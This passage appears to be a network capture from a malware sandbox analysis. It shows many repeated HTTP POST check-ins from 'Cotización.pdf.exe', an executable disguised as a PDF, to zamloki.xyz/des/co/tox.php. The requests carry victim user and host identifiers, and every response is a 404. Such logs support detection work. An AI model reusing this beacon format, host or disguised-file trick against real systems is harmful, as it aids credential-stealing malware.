                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    73192.168.2.349810172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:30.746182919 CEST5598OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:30.766701937 CEST5599OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:31.144428015 CEST5599INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:31 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GOh5K0GIog9VV7gVcw8s5utJ1afuwLbv8lxgIucFMRFx4XWDYxWQOcdRNSYndc5%2Fy0aeDW74bz3VEwNfVwKDcxgb3qVr5wyIA5Q9nVJDXQap5Kkv%2FLoRf7g8WAkdQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f8a486c2bd2-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    74192.168.2.349811172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:31.359134912 CEST5600OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:31.377118111 CEST5600OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:31.715429068 CEST5601INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:31 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eX2PLm88v2Y8T36ztvCX71RSRBUeTvRQVBj2YyorI3Jy%2FeAC0HrjOQeNSkwal1h06ALv8Gwa334Kxs3%2BS7APV%2ByFPRjmzoY1ru1M39znTytvnknKBwh%2Bf2LMrkxwOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f8e0cd04a7a-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    75192.168.2.349812104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:31.944170952 CEST5602OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:31.963999987 CEST5602OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:32.224174976 CEST5603INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:32 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oqTxIS3EwNs5ZteFToLlWsfzFpslFBwLMc33euusIa6omsKL54AKJSRV337IXqhw1M%2Bb7IBI9eDrcReSs%2BAEK06%2BZixfTtB2zoGWMnifhikoNeERl3ftDxBDdjgiSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f91b94c0ea7-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    76192.168.2.349813104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:32.425812006 CEST5604OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:32.443944931 CEST5604OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:32.695084095 CEST5605INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:32 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZfGLYtIfuLh0QQ1qqe%2Bw4PL%2Fg4Z76ZH7K4RMVXgyJNAYfe9knpn5Vkuq6QjK3Mu9LjbGtgd3nzTnBQmFi4QqqswFevGbAUvqEa9BK2iPJZiKjrqfRPxgztkNuy1HJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f94bbb64e1a-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    77192.168.2.349814172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:32.886717081 CEST5606OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:32.907388926 CEST5606OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:33.204293966 CEST5607INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:33 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZakDddFyg6EWnXKEDznMwPL5FrQUmdEMnNkY7qB2occrtR%2FitB1kI8Lqt2kw7SNQZXvEd3BmsTSiGM%2B1xa3ZIygt614vuPjd0MBnjd9sx%2B1LUvMmCMhDVYGXVwXW1g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f979be94e5b-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    78192.168.2.349815172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:33.415034056 CEST5608OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:33.433681965 CEST5608OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:33.672878027 CEST5609INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:33 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tllBRmylcZA33KVOhjlE7jjWef6ZjpmcCbGzJYQROdlZn8%2FeoAoOlx4%2BkT2xCvjvLUmaWmm8%2BuvUYe1sYD9e%2FhijIA4nWWHzAThJkOoccKzFXM2RColehT0RadHcrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f9aeba62c26-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    79192.168.2.349816172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:33.875912905 CEST5609OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:33.897332907 CEST5610OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:34.153239012 CEST5610INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:34 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X%2B5YPneJjO5R1fP631dWOoh9F5lUp2OsytC%2B9tw4tcAwtvClITASLrYadulSYFHfnCyBZph3RQZrghi6QBBpc0K%2FG0Ladb0pA7ywSdUBMNMZmaLmQkmbzMD8EqreTw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254f9dccbdd6c1-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    8192.168.2.349736104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:01:52.475317955 CEST1292OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:52.495419979 CEST1292OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:52.748554945 CEST1293INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:52 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fioOzaKNPTtwICkRN3aMOamnOQyuayoXhaeRQu2KLfFvxp7tuyRIoFIC%2BC6CABR0z01irMbDIyId%2FOdYbKQwbmCzbA%2FkyI0zUpnGvFs%2BiIoEG8uYgIQiJTXMnMTqrw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254e9b0e711f25-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    80192.168.2.349817104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:34.390110970 CEST5611OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:34.408862114 CEST5612OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:34.666239977 CEST5612INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:34 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bFNf%2Bt9af5TD4ctvEyTuvwTFtScPiyLS4Caclw177Hadt%2FyIbqcQmfMSRH3VV1w1LQn4wVrjvKCuRiZqEuHszkwq53uNs5noJMAZMMZjo1KufRcNN5gMXOnZXSjIMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fa1084e4a9e-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    81192.168.2.349818172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:34.914148092 CEST5613OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:34.934027910 CEST5613OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:35.236706972 CEST5614INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:35 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QU8DB0gfr7DIsbK%2BWArqm4Qf1jHMljAZdVzouEOEh%2FZDQs%2FR1xTCCMMVoUUAXmgxY%2BSVgYQIyhe7UHmVLP2NCyxdBUSDP6wUxM9ZY%2B9v%2Fl5Lu65I8%2F1ewz%2B8ayCIow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fa44d9f05dc-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    82192.168.2.349819104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:35.455161095 CEST5615OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:35.473331928 CEST5615OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:35.748667955 CEST5616INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:35 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AT73MEvW0zdyA8YaepmNBw1xvvZcMJ41f8aW0E%2FxXZJibMKSZqW26QP58Kx5HH%2Fpx3qA1fh%2Bz8FiVBM55cjLI7XUVwfkoiIx3QPhg1%2FzZBEoMMISMZzSTxrCfIyAbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fa7ac904a74-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    83192.168.2.349820104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:35.957509041 CEST5617OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:35.977525949 CEST5617OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:36.568526983 CEST5618INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:36 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eKV9L8YALWdXpMqZTYwqrEkDiVriWK%2BQ2LdkFfZbETwMwk2bFin9GxFvj4ax3BstVtV4FsXSjTEcrHethH%2BZkb3GqeU9sKucLK%2FYX69ZJ2x7IDmpE8HC8KU8qcoZ7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254faaceed177a-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    84192.168.2.349821172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:36.779628992 CEST5619OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:36.799360037 CEST5619OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:37.055495977 CEST5620INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:37 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M16V9th6Qc0fAhjCqdMNJ5BPxEo2MUaEYgZhcnggTsTWlroxf5gH%2BK1VaxqAWVpLW9oXXEGeHhKxbzrI83thM0hwbsOuEHsetbx9NPLAELpX79K6L0Q9FDo%2Fo0mE7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254faffb974e14-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    85192.168.2.349822104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:37.265544891 CEST5621OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:37.285908937 CEST5621OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:37.673501968 CEST5622INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:37 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
